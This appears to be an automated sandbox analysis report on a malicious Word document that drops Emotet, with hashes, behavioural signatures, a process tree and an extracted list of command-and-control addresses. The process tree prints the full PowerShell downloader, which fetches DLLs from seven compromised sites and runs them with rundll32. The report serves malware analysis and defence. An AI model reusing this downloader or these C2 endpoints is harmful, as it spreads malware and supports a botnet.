Analysis
-
max time kernel
58s -
max time network
38s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
17-11-2021 21:11
Static task
static1
General
-
Target
06012c700c1dac4c122303e920fdf1c71c41e681673c241c9698e5766df275a8.doc
-
Size
140KB
-
MD5
391dca4cf91ae12aa1b5ac9d0ac3ec41
-
SHA1
47cfcf587d838f68a8f8df53ea3afae475436992
-
SHA256
06012c700c1dac4c122303e920fdf1c71c41e681673c241c9698e5766df275a8
-
SHA512
de299156048c8cb81fe9a5e839442347d118b9de47b353500647a73d4b97f010dcef6d6eb3c7ee9b04874010efd0b9f3b8790f8f9013a47271528eaed1be0c41
Malware Config
Extracted
emotet
Epoch4
91.200.186.228:443
191.252.196.221:8080
94.177.248.64:443
66.42.55.5:7080
103.8.26.103:8080
185.184.25.237:8080
103.8.26.102:8080
178.79.147.66:8080
58.227.42.236:80
45.118.135.203:7080
103.75.201.2:443
195.154.133.20:443
45.142.114.231:8080
212.237.5.209:443
207.38.84.195:8080
104.251.214.46:8080
212.237.17.99:8080
212.237.56.116:7080
216.158.226.206:443
110.232.117.186:8080
158.69.222.101:443
107.182.225.142:8080
176.104.106.96:8080
81.0.236.90:443
50.116.54.215:443
138.185.72.26:8080
51.68.175.8:8080
210.57.217.132:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 624 2756 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 7 IoCs
Processes:
powershell.exerundll32.exeflow pid process 21 3680 powershell.exe 26 3680 powershell.exe 28 3680 powershell.exe 30 3680 powershell.exe 31 3680 powershell.exe 45 3276 rundll32.exe 46 3276 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid process 1296 rundll32.exe 3648 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Oqligb\gduktbzj.mro rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2756 WINWORD.EXE 2756 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exerundll32.exepid process 3680 powershell.exe 3680 powershell.exe 3680 powershell.exe 3276 rundll32.exe 3276 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3680 powershell.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
Processes:
WINWORD.EXEpid process 2756 WINWORD.EXE 2756 WINWORD.EXE 2756 WINWORD.EXE 2756 WINWORD.EXE 2756 WINWORD.EXE 2756 WINWORD.EXE 2756 WINWORD.EXE 2756 WINWORD.EXE 2756 WINWORD.EXE 2756 WINWORD.EXE 2756 WINWORD.EXE 2756 WINWORD.EXE 2756 WINWORD.EXE 2756 WINWORD.EXE 2756 WINWORD.EXE 2756 WINWORD.EXE 2756 WINWORD.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
WINWORD.EXEcmd.exepowershell.exerundll32.exerundll32.exerundll32.exedescription pid process target process PID 2756 wrote to memory of 624 2756 WINWORD.EXE cmd.exe PID 2756 wrote to memory of 624 2756 WINWORD.EXE cmd.exe PID 624 wrote to memory of 3680 624 cmd.exe powershell.exe PID 624 wrote to memory of 3680 624 cmd.exe powershell.exe PID 3680 wrote to memory of 1296 3680 powershell.exe rundll32.exe PID 3680 wrote to memory of 1296 3680 powershell.exe rundll32.exe PID 3680 wrote to memory of 1296 3680 powershell.exe rundll32.exe PID 1296 wrote to memory of 3648 1296 rundll32.exe rundll32.exe PID 1296 wrote to memory of 3648 1296 rundll32.exe rundll32.exe PID 1296 wrote to memory of 3648 1296 rundll32.exe rundll32.exe PID 3648 wrote to memory of 3768 3648 rundll32.exe rundll32.exe PID 3648 wrote to memory of 3768 3648 rundll32.exe rundll32.exe PID 3648 wrote to memory of 3768 3648 rundll32.exe rundll32.exe PID 3768 wrote to memory of 3276 3768 rundll32.exe rundll32.exe PID 3768 wrote to memory of 3276 3768 rundll32.exe rundll32.exe PID 3768 wrote to memory of 3276 3768 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\06012c700c1dac4c122303e920fdf1c71c41e681673c241c9698e5766df275a8.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\SysWow64\rundll32.exe"C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\1516382224.dll,f216638914⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\1516382224.dll",Control_RunDLL5⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oqligb\gduktbzj.mro",uMvT6⤵
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Oqligb\gduktbzj.mro",Control_RunDLL7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3276
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
1a8a8545ee463d23f528e4f9287e02c6
SHA172f7bc18d7ef73074fabfeed68f59ce92844dcd5
SHA256a2aeeca816a5d3ee134314b4e055c2b21d5d8ee546e050652978b8cf51cca836
SHA512f123c1852ce1b887166cd5706e7a80a21e74dd79cdd31e22dddcd360de51db227f44355cf46e099b378e8da93f39f52f6df37f7c762ead16410bcf56a9f19874
-
MD5
1a8a8545ee463d23f528e4f9287e02c6
SHA172f7bc18d7ef73074fabfeed68f59ce92844dcd5
SHA256a2aeeca816a5d3ee134314b4e055c2b21d5d8ee546e050652978b8cf51cca836
SHA512f123c1852ce1b887166cd5706e7a80a21e74dd79cdd31e22dddcd360de51db227f44355cf46e099b378e8da93f39f52f6df37f7c762ead16410bcf56a9f19874
-
MD5
1a8a8545ee463d23f528e4f9287e02c6
SHA172f7bc18d7ef73074fabfeed68f59ce92844dcd5
SHA256a2aeeca816a5d3ee134314b4e055c2b21d5d8ee546e050652978b8cf51cca836
SHA512f123c1852ce1b887166cd5706e7a80a21e74dd79cdd31e22dddcd360de51db227f44355cf46e099b378e8da93f39f52f6df37f7c762ead16410bcf56a9f19874